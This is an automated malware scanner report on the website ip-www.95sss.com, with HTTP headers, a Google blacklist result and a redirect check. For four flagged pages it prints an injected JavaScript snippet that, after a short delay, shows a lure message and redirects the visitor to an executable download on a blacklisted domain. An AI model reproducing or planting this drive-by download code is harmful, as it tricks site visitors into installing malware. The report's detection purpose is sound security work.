New scan:

Malware Scanner report for ip-www.95sss.com

Malicious/Suspicious/Total urls checked
0/4/16
4 pages have suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ip-www.95sss.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ip-www.95sss.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://ip-www.95sss.com/
HTTP/1.1 200 OK
Date: Sat, 28 Feb 2015 10:03:15 GMT
Accept-Ranges: bytes
ETag: "b63ce37a5e4cd01:fc5"
Server: Microsoft-IIS/6.0
Content-Length: 10238
Content-Location: http://ip-www.95sss.com/default.htm
Content-Type: text/html
Last-Modified: Thu, 19 Feb 2015 16:09:46 GMT
X-Powered-By: ASP.NET
clean
http://ip-www.95sss.com/default.htm
200 OK
Content-Length: 10238
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.youxintouzi.com

...[3694 bytes skipped]...
;/script><div class="clear"></div>
</div>
<div class="bbg20"></div>
</div>
<script language="JavaScript">
window.setTimeout("PopDownload()", 4 * 1000);
function PopDownload() {
window.alert("¿ì²¥ÒѾ­±»ºÍг£¬±¾Õ¾ÆôÓÃȫв¥·ÅÆ÷¿á²¥Ó°ÊÓ£¬°²×°ºóÔËÐм´¿É¹Û¿´ÉÏÍòˬƬ£¡");
location.href = "http://www.youxintouzi.com/kuplay_110_12791.exe";
}
</script>
<div id="footer">
<div id="bottom">
<div class="layout mt10">
<div class="tbg20"></div>
<div class="mainArea px9">
<h2 class="ml10">ÓÑÇéÁ´½Ó</h2>
<ul class="bottomSponsor"></ul>
<div class="clear">&
...[570 bytes skipped]...

http://ip-www.95sss.com/top.js
200 OK
Content-Length: 611
Content-Type: application/x-javascript
clean
http://ip-www.95sss.com/foot.js
200 OK
Content-Length: 766
Content-Type: application/x-javascript
clean
http://ip-www.95sss.com/list/index39.html
200 OK
Content-Length: 7687
Content-Type: text/html
clean
http://ip-www.95sss.com/list/../top.js
200 OK
Content-Length: 611
Content-Type: application/x-javascript
clean
http://ip-www.95sss.com/list/../foot.js
200 OK
Content-Length: 766
Content-Type: application/x-javascript
clean
http://ip-www.95sss.com/list/../default.htm
200 OK
Content-Length: 10238
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.youxintouzi.com

...[3694 bytes skipped]...
;/script><div class="clear"></div>
</div>
<div class="bbg20"></div>
</div>
<script language="JavaScript">
window.setTimeout("PopDownload()", 4 * 1000);
function PopDownload() {
window.alert("¿ì²¥ÒѾ­±»ºÍг£¬±¾Õ¾ÆôÓÃȫв¥·ÅÆ÷¿á²¥Ó°ÊÓ£¬°²×°ºóÔËÐм´¿É¹Û¿´ÉÏÍòˬƬ£¡");
location.href = "http://www.youxintouzi.com/kuplay_110_12791.exe";
}
</script>
<div id="footer">
<div id="bottom">
<div class="layout mt10">
<div class="tbg20"></div>
<div class="mainArea px9">
<h2 class="ml10">ÓÑÇéÁ´½Ó</h2>
<ul class="bottomSponsor"></ul>
<div class="clear">&
...[570 bytes skipped]...

http://ip-www.95sss.com/list/../list/index39.html
200 OK
Content-Length: 2646
Content-Type: text/html
clean
http://ip-www.95sss.com/list/../list/../default.htm
200 OK
Content-Length: 10238
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.youxintouzi.com

...[3694 bytes skipped]...
;/script><div class="clear"></div>
</div>
<div class="bbg20"></div>
</div>
<script language="JavaScript">
window.setTimeout("PopDownload()", 4 * 1000);
function PopDownload() {
window.alert("¿ì²¥ÒѾ­±»ºÍг£¬±¾Õ¾ÆôÓÃȫв¥·ÅÆ÷¿á²¥Ó°ÊÓ£¬°²×°ºóÔËÐм´¿É¹Û¿´ÉÏÍòˬƬ£¡");
location.href = "http://www.youxintouzi.com/kuplay_110_12791.exe";
}
</script>
<div id="footer">
<div id="bottom">
<div class="layout mt10">
<div class="tbg20"></div>
<div class="mainArea px9">
<h2 class="ml10">ÓÑÇéÁ´½Ó</h2>
<ul class="bottomSponsor"></ul>
<div class="clear">&
...[570 bytes skipped]...

http://ip-www.95sss.com/list/../list/../top.js
200 OK
Content-Length: 611
Content-Type: application/x-javascript
clean
http://ip-www.95sss.com/list/../list/../foot.js
200 OK
Content-Length: 766
Content-Type: application/x-javascript
clean
http://ip-www.95sss.com/list/../list/../list/index39.html
200 OK
Content-Length: 7687
Content-Type: text/html
clean
http://ip-www.95sss.com/list/../list/../list/../top.js
200 OK
Content-Length: 611
Content-Type: application/x-javascript
clean
http://ip-www.95sss.com/list/../list/../list/../foot.js
200 OK
Content-Length: 766
Content-Type: application/x-javascript
clean
http://ip-www.95sss.com/list/../list/../list/../default.htm
200 OK
Content-Length: 10238
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.youxintouzi.com

...[3694 bytes skipped]...
;/script><div class="clear"></div>
</div>
<div class="bbg20"></div>
</div>
<script language="JavaScript">
window.setTimeout("PopDownload()", 4 * 1000);
function PopDownload() {
window.alert("¿ì²¥ÒѾ­±»ºÍг£¬±¾Õ¾ÆôÓÃȫв¥·ÅÆ÷¿á²¥Ó°ÊÓ£¬°²×°ºóÔËÐм´¿É¹Û¿´ÉÏÍòˬƬ£¡");
location.href = "http://www.youxintouzi.com/kuplay_110_12791.exe";
}
</script>
<div id="footer">
<div id="bottom">
<div class="layout mt10">
<div class="tbg20"></div>
<div class="mainArea px9">
<h2 class="ml10">ÓÑÇéÁ´½Ó</h2>
<ul class="bottomSponsor"></ul>
<div class="clear">&
...[570 bytes skipped]...


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ip-www.95sss.com

Result:
HTTP/1.1 200 OK
Date: Sat, 28 Feb 2015 10:03:15 GMT
Accept-Ranges: bytes
ETag: "b63ce37a5e4cd01:fc5"
Server: Microsoft-IIS/6.0
Content-Length: 10238
Content-Location: http://ip-www.95sss.com/default.htm
Content-Type: text/html
Last-Modified: Thu, 19 Feb 2015 16:09:46 GMT
X-Powered-By: ASP.NET

...10238 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ip-www.95sss.com
Referer: http://www.google.com/search?q=ip-www.95sss.com

Result:
The result is similar to the first query. There are no suspicious redirects found.